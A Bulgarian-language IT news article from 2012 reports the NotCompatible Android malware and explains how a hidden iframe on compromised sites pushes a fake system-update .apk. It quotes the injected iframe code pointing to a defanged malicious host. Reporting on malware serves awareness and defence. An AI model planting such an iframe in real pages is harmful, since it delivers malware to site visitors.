Нов зловреден код заразява Android

05.05.2012 21:40
Нов зловреден код поразява Android чрез заразени уебсайтове.

Lookout, компания за сигурността на данните на мобилни устройства, предупреждава за нов вид вирус, който може би се разпространява на Android таблети или други устройства. Въведен като "NotCompatible", зловредният код се разпространява чрез уеб браузъра на Android, който се смята, че е първи за мобилната операционна система. Преди да е настъпила масова паника обаче, има няколко неща, които потребителите на Android трябва да знаят. Първо, зловредният код не изглежда е толкова пагубен или поне не за момента. Второ, NotCompatible все още изисква реакция и намеса от страна на потребителя, за да се инсталира.

Въпреки че вирусите, троянците и другите гадинки най-общо казано идентифицират слабите места на браузърите, до момента има много малко примери за такъв тип атаки в света на мобилните устройства. NotCompatible всъщност не манипулира уеб браузъра на Android, а нещо повече, възползва се от някои не до толкова добри решения в дизайна, които могат да се манипулират, за да се ‘прилъжат’ не толкова запознатите потребители, които да склонят бързо да го инсталират.

Ето и как работи: Бъгът ‘живее’ в скрит iframe на заразени уебсайтпве. Зловредният код след това се разпространява като се изпраща инфектиран .apk файл до телефона или таблета на потребителя, а този файл е маскиран като автоматичен даунлоуд. Както с всички други вируси и други подобни вредители, не е нужно само да се изтегли файл, но също така трябва и да се изпълни, тоест инсталира. След като файлът е приключил изтеглянето си, уебсайтът изпраща сигнал на потребителя, че е наличен нов системен ъпдейт. Ако нищо неподозиращия потребител се подведе, ще инсталира .apk файла и ще даде на NotCompatible достъп до устройството.

Заразените сайтове в общия случай имат следния код, вложен в долната част на всяка страница:

<iframe style=”visibility: hidden; display: none; display: none;” src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

Въпреки че NotCompatible не се асоциира с определена заплаха в момента, възможно е да функционира като троянец или прокси за нещо още по-лошо.

По статията работи: , последно обновена: 06.05.2012 09:46:01
Новини по темата

Вече и Linux с вируси

Най-интересните вируси за 2008г.

Нов руткит за Windows е 100% неоткриваем

Ще покажат HTC Dream с Google Android на 6 май

Буря на Свети Валентин

Да, създаването на Windows вирус е толкова лесно!

Най-добрата антивирусна за 2008г.

Първият автор на вируси, арестуван в Япония

Троянският кон Ransomware заключва инфектирани компютри


 
Коментари

Все още няма коментари.

 
Вашето мнение:

Заглавие:






информирай ме при нов коментар
Запиши като:

E-mail:
 Задължително поле





Кога е рожденият ден на Google

Послушва ли ни Google? Може ли Google да ви подслушва през Chrome?

Sony ликвидира всички свои магазини в Канада!

Linux Mint и CompuLab представиха мини компютър с 4 гигабайта оперативна памет!

Британците губят почти 5,4 милиарда лири, заради лоши мобилни тарифи!

Почти 20 хиляди сайта са свалени във Франция след случилото се с Charlie Hebdo.

Toyota ще учи деца да шофират с Oculus Rift!

BlackBerry се готви да представи нов телефон с плъзгаща клавиатура!

[ВИДЕО] Вижте колкото е най-голямата галактика в познатата ни вселена

Създават атомен реактор, който ще работи с разтопена сол!
noTrial.info в Google+



noTrial.bg е портал за IT новини и каталог с безплатен софтуер.
Възпроизвеждането на информация от страницата се разрешава
единствено след изрично съгласие от екипа на NoTrial.bg
Контакти | Условия за ползване | За нас | Блог